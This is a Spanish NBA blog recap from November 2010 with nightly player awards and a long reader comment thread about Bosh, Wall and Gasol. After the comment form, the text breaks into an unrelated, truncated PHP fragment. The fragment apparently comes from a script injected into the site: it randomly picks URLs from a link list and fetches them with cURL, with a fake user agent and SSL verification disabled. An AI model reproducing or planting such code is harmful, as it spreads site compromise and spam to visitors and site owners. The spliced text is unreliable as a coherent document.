La Crónica (05/11/2010)

06 de November de 2010 por Viva_Dirk

Rapidito que tenemos poco tiempo y mucho que contar. Vamos a ello.

Segunda derrota de los “Beach Boys” en una plaza complicada este curso como vuelve a ser el Arena de Nueva Orleans. Okafor se puso ciego por dentro y Ariza defendió muy dignamente a LeBron. Recordemos que los Hornets llevan un balance inmaculado de 5-0.

Los otros dos invictos también jugaban anoche y ganaron, pero ambos con más problemas de los esperados. Los Lakers tuvieron que darlo todo contra Toronto. Gasol sobreexplotado con 44 minutos y con razón esta vez porque si no hubieran perdido. No es normal que los canadienses te saquen 20 rebotes de ventaja. Reggie Evans y Amir Johnson aprovecharon las facilidades que dieron los amarillos.  Calderón estuvo magnífico. A ver si vuelve a ser el que era.

Por su parte, los Hawks no sufrieron tanto ante los Wolves y eso que tuvieron que jugar muchos minutos con Josh Powell y Jason Collins (y no lo hicieron mal, ojo), La defensa de los “lobitos” necesita mejorar.

Un escalón por debajo vienen fuertes Magic y Celtics. Los primeros no tuvieron muchos problemas contra los Nets, con Howard abusando y los verdes tuvieron que ir a la prórroga para conseguir doblegar a Chicago. Partidazo colectivo de los de Rivers ante unos más que correctos Bulls.

Del resto de los partidos destacó el Grizzlies@Suns con dos prórrogas. Los “osetes” permitieron un alley-hoop de Richardson a saque de banda que les impidió cerrar en el reglamentario.

Conviene no perder de vista a los Warriors. Anoche aseguraron su 4-1, pero lo noticioso es que lo hicieron jugando a 80 puntos contra Sloan y sus Jazz. Sorprenden también los Cavs, que anoche les endosaron 123 a los Sixers con, agarraos, Varejao de primera espada.

Debutó Arenas en el Madison en un gran partido de los locales. Interesante irrupción de la segunda unidad de los de D’Antoni, con Wilson Chandler y Douglas a la cabeza. Hasta 6 tipos firmaron dobles figuras. Arenas, por cierto, estuvo correcto en su nuevo papel de anotador puro.

Nos falta mencionar que los Pistons se estrenaron frente los Bobcats, con T-Mac y Ben Gordon de inesperados directores de juego. Que los Bucks despertaron contra Indiana (los cuales se prestan a ser despertadores del rival de turno) y que los Nuggets ganaron, cómo no, a los Clippers.

PREMIOS

MVP: Cantidad y calidad como cada viernes. De menos a más tenemos a Ray Allen 25-3-3, Salmons 22-5-5, Douglas con 19-10, Varejao 23-12, Pau Gasol 30-7-3, Carmelo 30.5-6. El bronce para Dwight Howard con 30 puntos, 16 rebotes y 12 de 16 en tiros libres, la plata para Jason Richardson que tras dos prórrogas se fue a los 38 puntos, 8 rebotes, 3 asistencias y 4 robos, y el premio para el duo formado por Chris Paul y Emeka Okafor que doblegaron a Miami con muy poca ayuda, 13 puntos, 19 asistencias y 5 robos para el base, 26 puntos, 13 rebotes y 12 de 13 en tiros para el pívot.

Rookie: Anoche jugaban Blake Griffin y John Wall. Ganó la batalla y se lleva el premio con un auténtico partidazo el de Los Angeles de 26 puntos y 10 rebotes. Wall perdió nada menos que 9 balones, este aspecto le va a costar sin duda. Buen partido de Wes Johnson con 18 puntos, 20 minutitos le dieron a Greg Monroe que hizo 9 puntos y 6 rebotes, mientras que Eric Bledsoe sigue a gran nivel en ausencia de Davis, anoche 12 puntos y 13 asistencias.

Sorpresa: Segunda jornada consecutiva que se hace con el premio Toney Douglas, esta vez con 19 puntos y 10 rebotes liderando a los Knicks a la victoria. Habrá que estar pendientes de él. Y ayer hizo un intento de justificar su renovación Amir Johnson con 12 puntos y 15 rebotes.

Decepción: Chris Bosh no está siendo de momento el tercer pilar que se suponía. Nadie le va a pedir que siga con sus anteriores números, pero un rebote en 33 minutos es pura dejadez. Kirilenko fue el punto debil de los Jazz con 4 puntos y 0 de 3 en tiros durante los 27 minutos que estuvo en cancha.

MEV: Tantos como candidatos al MVP. Blatche 22-6, Marc Gasol 26-7, Griffin 26-10 y Noah 26-12. El premio para Jrue Holiday con 29 puntos, 8 asistencias, 2 rebotes, 2 robos, 0 perdidas de balón, 3 de 5 en triples y 10 de 17 en tiros.Si no lo hubieran eliminado por 6 faltas puede que Cleveland no hubiese culminado su remontada.

Comenta

30 comentarios a esta entrada

  1. troll dice:
    #1

    NO 5-0,con este balance ya lo tienen mucho mas fácil para PO,Calderon partidazo

      Citar

  2. LEmontus dice:
    #2

    De momento No me está callando la boca… aunque sigo pensando que son de los peores equipos.

    Warrick increible como siempre, promedia 12 puntos en 25 min y con 60% de campo y no está teniendo muchísimos balones. Dragic tiene mucho talento y es rapidísimo pero le hace fatla un poco de humildad y no ser tan chupón.

    Mis bucks ganan si Bogut gracias a Jennings y un gran (menos mal) Salmons. Mbah-Moute haciendo mértios para relegar a gooden al banco.

    Wall no se como lo vereis pero no es nada del otro mundo me parece un paquete y ahora que está Arenas lo va a pasar mal.

      Citar

  3. LEmontus dice:
    #3

    Me hariais un gran favor si alguien me dice que ha pasado con Stuckey.. el ultimo partido jugó 10 min y este no ha jugado y según Nba coach decission.

      Citar

  4. Tiago dice:
    #4

    Wall va a marcar una época

      Citar

  5. baruC dice:
    #5

    Wall un paquete Lemontus?? Le has visto alguna vez en tu vida?

      Citar

  6. Jona dice:
    #6

    GS está bien este año ganado el rebote a todos sus rivales, cosa que el año pasado ocurriria uno o dos partidos, quitandose la mala suerte de los últimos años y repartiendo el tiro a ver si los volvemos a ver en playoffs despues de una sola aparición en playoffs en los últimos 16años , creo que la peor de la nba

      Citar

  7. sergio dice:
    #7

    Más que el hecho de que Memphis perdiera el partido en ese alley-oop, lo triste es ver a Rudy Gay no fallar el segundo tiro libre con 4 decimas por delante a proposito y dar lugar a que te hagan esa jugada. Que hubiese podido pasar igual? quizas.. que solo en la lucha por el rebote se pueden ir esas 4 decimas… tambien. Su cara era todo un poema, parece que no sabe tirar a fallar

      Citar

  8. Denise dice:
    #8

    Sobre Orlando, Howard ayer hizo lo que le dio la gana ante un Brook Lopez horrible ayer.
    Que Duhon y Richardson vistan la camiseta de los Magic es una deshonra y un insulto para la franquicia. Con lo bien que lo estabas haciendo Otis…..

    Sobre Lakers, ayer jugaron sin ninguna motivación, pensando más en la fiesta que se iban a pegar por los garitos de LA tras el partido, que en ganar al peor equipo de la NBA. Cuando los Lakers se ponían minimamente el mono de trabajo, los Raptors encajaban parciales de 8-0, 12-4, ….
    Phil está cargando de minutos a Gasol, cosa que no entiendo a estas alturas de temporada, y Ratliff juega todavía menos que Mbenga.
    Gran aportación en estos 6 partidos del Tridente B (Blake, Brown, Barnes), qué diferencia respecto al banquillo del año pasado.

    Los palos hacia Bosh, los veo exagerado, para empezar, Chris nunca ha sido un gran defensor, no le pidais ahora peras al olmo, además solo van 6 partidos, hay que dejad que cada uno vaya acoplandose poco a poco a su rol, cosa no fácil en este equipo tan renovado y con tantos gallos.

      Citar

  9. troll dice:
    #9

    Para mi GS tiene su mejor juego interior en 20 años y uno de los juegos interiores que tiene mas facilidad para rebotear en todo la liga.

    LEmontus ,sigue recto y entra en tu cueva.

      Citar

  10. nacho dice:
    #10

    Si, Denise, Bosh está en un equipo de gallos, pero él iba de uno de ellos. Pufo sobrevaloradísimo.

      Citar

  11. Denise dice:
    #11

    Yo, Personalmente, no catalogaría a Bosh de pufo.
    En junio, estoy seguro de que todo el mundo alucinaba con la marcha de Bosh a Miami, y lo veía vital para conseguir el anillo. Dale tiempo.

      Citar

  12. HisRoyalAirness dice:
    #12

    Para mí Bosh no es un pufo, ni mucho menos, pero a un tío de 2´10 que cobra 20 kilos al año yo le exijo un rendimiento defensivo mínimo; no digo que coja 20 rebotes y ponga 8 tapones pero la frase de “yo no soy pivot, soy power forward” no te exime de tus responsabilidades en la pintura.
    Vale que Lebron y Wade a veces van como fieras a por los rebotes defensivos y dejan a los demás sin ellos pero CB tiene ventaja en altura y en posición en la cancha para cazar más de 6 o 7 (ya no hablo de los ofensivos).
    Si yo soy el coach y veo lo que hizo en la zona Okafor en el primer cuarto Bosh se lleva la bronca de su vida. Hay que jugar con más ganas.

      Citar

  13. kantonyo dice:
    #13

    El nivel de Chris Bosh está siendo bastante pobre, pero hay que darle margen para saber si con el tiempo va demostrando si es un jugador campeón o simplemente un jugador que hace números para un equipo de segunda clase. Lo que tengo muy claro es que Pau Gasol nada más llegar a Lakers demostró su talento, si hubiera tenido un rendimiento como Chris Bosh le hubieran caído hostias por todos los lados…

    Hablando de Pau… viendo sus primeros 6 partidos me pregunto que hubiera pasado si este chico en vez de tener una media de 13-14 lanzamientos por partido le hubieran dado la oportunidad de lanzarse una media de 18,7 tiros como ha hecho estos 6 primeros encuentros. Este es el dato:

    año 2002: MEMPHIS: 82 p – 17.6 pp – 13.0 tiros/p – 25,3 ptos si hubiera tirado 18,7 por partido
    año 2003: MEMPHIS: 82 p – 19.0 pp – 13.6 tiros/p – 26,1
    año 2004: MEMPHIS: 78 p – 17.7 pp – 13.4 tiros/p – 24,6
    año 2005: MEMPHIS: 56 p – 17.8 pp – 12.4 tiros/p – 26,8
    año 2006: MEMPHIS: 80 p – 20.4 pp – 14.9 tiros/p – 25,5
    año 2007: MEMPHIS: 59 p – 20.8 pp – 14.5 tiros/p – 26,7
    año 2008: MEM-LAL : 63 p – 19.8 pp – 14.1 tiros/p – 26,2
    año 2009: LAKERS : 81 p – 18.9 pp – 12.9 tiros/p – 27,3
    año 2010: LAKERS : 65 p – 18.3 pp – 13.0 tiros/p – 26,4
    año 2011: LAKERS : 6 p – 24.8 pp – 18.7 tiros/p – 24,8

    Con estos datos quiero demostrar que Pau no es que esté en mejor nivel que otras veces sino que ahora es más participativo y lo otro que quiero demostrar es que si Gasol hubiera tenido esa responsabilidad estaríamos hablando de unos datos de superestrella.

    Lebron James no tiene en Miami las mismas estadísticas que en Cleveland por algo parecido a esto, en vez de tirarse 21 tiros por partido como en toda su trayectoria de media, se está tirando sólo 14.

    Alguno puede pensar, si a Howard le dejan también tirarse 18 tiros por partido haría más puntos, pero por ahora Howard no ha demostrado nunca que tirándose esos tiros gane su equipo 6 partidos seguidos. El año pasado lanzó esa cantidad tres veces, y su equipo perdió en dos ocasiones.

      Citar

  14. LEmontus dice:
    #14

    Troll no vayas tan rápido…

    Wall no me parece que esté a la altura de ser Nº 1 del draft al menos de momento. Y lo que si estoy seguro que mientras el lleve el timón de Wizards no van a llegar a nada.

      Citar

  15. Txusma dice:
    #15

    Me da Lemontus que te vas a tener que tragar tus palabras. Para mi Wall es un más q digno número 1 del draft. El único jugador q le hace sombra es Blake Griffin que es otro número 1 del draft. Creo q es lo más normal del mundo que un rookie pierda balones, haga malos partidos de manera puntual y tenga unos porcentajes de tiro pobres. Wall ha de aprender a tirar pero sabe dirigiar al equipo y penetra de manera increíble. En 2-3 años, será una de las estrellas de la liga, sin duda alguna.

    Y destacar también a Eric Bledsoe. Davis y Foye lo van a tener que hacer muy bien para sentarlo. Es muy parecido a Rondo, no?

      Citar

  16. Rompe dice:
    #16

    Hombre kantoyo, creo que la diferencia más obvia entre los Carmelo, Durant & Company respecto a los demás son principalmente los tiros de los que disponen. No te digo que cualquiera pueda promediar 30 puntos por partido, pero muchos sí que llegarían a los 25, creo yo. Lo que pasa es que en cada equipo hay 1, 2 ó 3 que son los que se tiran las zapatillas, el resto a esperar…

      Citar

  17. LEmontus dice:
    #17

    ojalá me equivoque y Wall sea una estrella pero no digo que sea malo por las pérdidas si no porque en dirección de equipo es bastante mediocre , bastante normalito en manejo de balón, muy muy regular tirando…. tiene cosas muy buenas que las ahce muy bien… pero Wizards no tiene tan mal equipo como para tirar una temporada liderados por wall.. es un opinión de pocos partidos puede ser que me equivoque pero son pocas.

      Citar

  18. LEmontus dice:
    #18

    no hablo de que haga 6 contras y las meta o des 9 asistencias fáciles en eso si es bueno pero para ganar partidos hay que tener otra cosa que si han tenido Jennings o Rose por ejemplo en su año rookie,

      Citar

  19. kantonyo dice:
    #19

    Rompe: La clave no está en si un jugador si se puede tirar 18 tiros mete 25 puntos por partido, sino si eso serviría para liderar a un equipo campeón. Por que Rudy Gay ahora mismo promedia 26.3 puntos por partido tirandose 20 tiros por partido y francamente no veo a los Grizzlies aspirando a nada.

    Yo a lo que me refiero es que Gasol ha demostrado que si ejerce esa responsabilidad puede llevar a un equipo de la talla de Lakers a aspirar a todo. Y que es injusto que se caiga de las listas de los 10 mejores de la liga, cuando no ha dependido de él ejercer esa responsabilidad.

    Desde que Gasol está en Lakers ha jugado 246 partidos con un porcentaje de victorias de 0.748. Con Gasol tirandose más de 15 tiros por partido ha tenido Lakers en esos encuentros un coeficiente de 0.795 (58-15), y con más de 18 tiros 0.760 (19-6).

      Citar

  20. aro_pasado_no_newtoniano dice:
    #20

    Según hoopshype,,,Bosh cobra 14500K$ y 20000K$.

      Citar

  21. Denise dice:
    #21

    Y Yo creo que Gasol no es un jugador con nivel NBA, los dos últimos anillos los han gando los Lakers gracias al trabajo de Powell y Mbenga en la pintura, no te jode… Lo que hay que leer….

      Citar

  22. troll dice:
    #22

    Eso digo yo…lo que hay que leer…digo que Gasol no esta entre los 10 mejores de la NBA no que no tenga nivel para jugar en ella…me da gracia eso que dicen de que Gasol ha sido el factor determinante y que sin Gasol los Lakers caen en 1r ronda,el factor determinante es Kobe no Gasol.

    Fisher-Kobe-Artest-Odom-Bynum
    Fisher-Brown-Artest-Gasol-Bynum-(Odom) tu eliges

    Para mi los Lakers sin Gasol seguirían siendo uno de los favoritos(siendo todo lo grande que es Gasol)mientras que sin Kobe si serian 1r 2n ronda.

      Citar

  23. Denise dice:
    #23

    Gasol es actualmente el mejor power foward de la NBA con diferencia, y, si me apuras, y con permiso de Howard, el mejor hombre alto, entendiendo por hombre alto, power-fowards y centers, de la NBA.
    Ya sé que el jugador franquicia de los Lakers es Kobe, pero eso no quita que Gasol esté a dia de hoy entre los 10 mejores jugadores, es más, lo meto en el quinteto ideal de largo.

      Citar

  24. Denise dice:
    #24

    Una pregunta Troll:
    ¿quien es actualmente el jugador con mayor valoracion de la NBA? ¿Puede ser catalán, quizás?

      Citar

  25. troll dice:
    #25

    Una pregunta Denise:

    ¿Se puede ser mas oportunista?

      Citar

  26. troll dice:
    #26

    Para mi Gasol actualmente es un top 20 de jugadores y un top 3 de interiores,eso si,pero te puedo decir 30 jugadores que prefiero tener en mi equipo actualmente antes que Gasol,simplemente por juventud,hace 15 años Gasol no estaria en el top 10 de jugadores interiores y si esta actualmente es por la falta de estos mismos y por la tendencia de secar mas jugadores exteriores que interiores.

      Citar

  27. Denise dice:
    #27

    Oportunista?? No sé, yo estoy hablando a día de hoy, yo no digo que Gasol tenga que estar en la lista hecha por Viva Dirk de los 10 mejores de la década, ahí no lo pondría, pero a 7 de Noviembre del 2010, Pau está entre los 10 mejores de la NBA sin ninguna duda, y el que no lo vea así, es ciego o tiene algo personal en contra del catalán.
    “Simplemente por juventud…..”” ni que Gasol tuviera 40 tacos, a Gasol le quedan 4 años de alto nivel salvo que tenga alguna lesión grave, claro.

    “hace 15 años Gasol no estaria en el top 10 de jugadores interiores y si esta actualmente es por la falta de estos ” ……Que yo sepa, hace 15 años, Gasol estaba en el instituto.
    En fin…

      Citar

  28. troll dice:
    #28

    LeBron,Durant,Wade,Paul,DWill,Melo,Howard,Kobe,GASOL

    Gasol tiene 30 tacos,y lo ultimo ni te respondo de lo demencial que es.

      Citar

  29. TheDeerHunter dice:
    #29

    Ya nos hemos visto obligado a sacar la tijera en los comentarios y no mola nada. No nos gustaría ejercer de policías… ya tenemos bastante trabajo habitualmente como para estar pendientes de los comentarios.
    Simplemente recordad que aquí no se permiten descalificaciones entre los bloggers.
    Reconducid el debate hacia la cordialidad que nos caracteriza, por favor.

      Citar

  30. GreenPride dice:
    #30

    Segunda derrota de los “Beach Boys” ante un sorprendente equipo de NOH. Los 3 grandes de los Heat dan la impresión de no saber jugar juntos todavía, el único que busca jugar en equipo aunque parezca broma desde mi punto de vista es Lebron que se le ve renunciar a algunas de sus entradas por intentar pasar el balón. Bosh no ha encontrado el sitio pero es absolutamente imprescindible si pretenden hacer algo cuando lleguen los Playoffs. De todas maneras todavia hay que darles tiempo. Los Heat necesitarán mucha más dureza interior para estar entre los favoritos. Por los Hornets, juegan como un auténtico equipo en ataque gracias en gran parte al “pequeño gran hombre” Chris Paul. Si hizo casi all-star a una medianía como Chandler, Okafor que es algo mejor se puede hinchar como hizo ayer. Me sorprendió Jason Smith saliendo del banco y la gran defensa de equipo. Ya veremos si siguen así o caen conforme avance la temporada

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>